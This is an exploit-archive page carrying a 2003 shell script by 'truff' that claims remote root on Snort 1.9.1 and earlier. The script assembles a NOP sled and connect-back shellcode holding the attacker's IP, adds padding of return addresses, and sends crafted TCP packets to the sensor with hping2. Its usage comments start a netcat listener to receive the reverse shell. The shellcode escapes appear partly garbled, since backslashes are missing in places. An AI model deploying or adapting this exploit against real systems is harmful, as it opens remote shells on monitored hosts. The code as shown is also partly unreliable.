[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Snort <=1.9.1 Remote Root Exploit (p7snort191.sh)
# Published : 2003-04-23
# Author : truff
# Previous Title : MS Windows SMB Authentication Remote Exploit
# Next Title : PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit
#!/bin/sh
##########################################################
# p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit #
# #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# #
# Usage: #
# 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l #
# #
# 2/ p7snort119.sh yourIP [Ret_Addr] #
# #
# Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) #
# #
# #
# This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. #
# #
# Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell #
# scripting stuff. #
# #
# www.projet7.org - Security Researchs - #
##########################################################
# Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor
# capture the packets.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)"
case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac
# Nops
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "x90" >> egg
done
# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "x31xc0x31xdbx31xc9x51xb1" >> egg
echo -n -e "x06x51xb1x01x51xb1x02x51" >> egg
echo -n -e "x89xe1xb3x01xb0x66xcdx80" >> egg
echo -n -e "x89xc2x31xc0x31xc9x51x51" >> egg
echo -n -e "x68" >> egg
# IP here
echo -n -e $(printf "\x%02x" $(echo $1 | cut -d. -f1)
$(echo $1 | cut -d. -f2)
$(echo $1 | cut -d. -f3)
$(echo $1 | cut -d. -f4)) >> egg
echo -n -e "x66x68xb0" >> egg
echo -n -e "xefxb1x02x66x51x89xe7xb3" >> egg
echo -n -e "x10x53x57x52x89xe1xb3x03" >> egg
echo -n -e "xb0x66xcdx80x31xc9x39xc1" >> egg
echo -n -e "x74x06x31xc0xb0x01xcdx80" >> egg
echo -n -e "x31xc0xb0x3fx89xd3xcdx80" >> egg
echo -n -e "x31xc0xb0x3fx89xd3xb1x01" >> egg
echo -n -e "xcdx80x31xc0xb0x3fx89xd3" >> egg
echo -n -e "xb1x02xcdx80x31xc0x31xd2" >> egg
echo -n -e "x50x68x6ex2fx73x68x68x2f" >> egg
echo -n -e "x2fx62x69x89xe3x50x53x89" >> egg
echo -n -e "xe1xb0x0bxcdx80x31xc0xb0" >> egg
echo -n -e "x01xcdx80" >> egg
# 3 dummy bytes for alignment purposes
echo -n -e "x41x41x41" >> egg
i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\x%02x" $var1 $var2 $var3 $var4) >> egg
done
# hping ruleZ
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014
1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014
1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff
1>/dev/null 2>/dev/null
rm egg
echo "Exploit Sended"
# www.Syue.com [2003-04-23]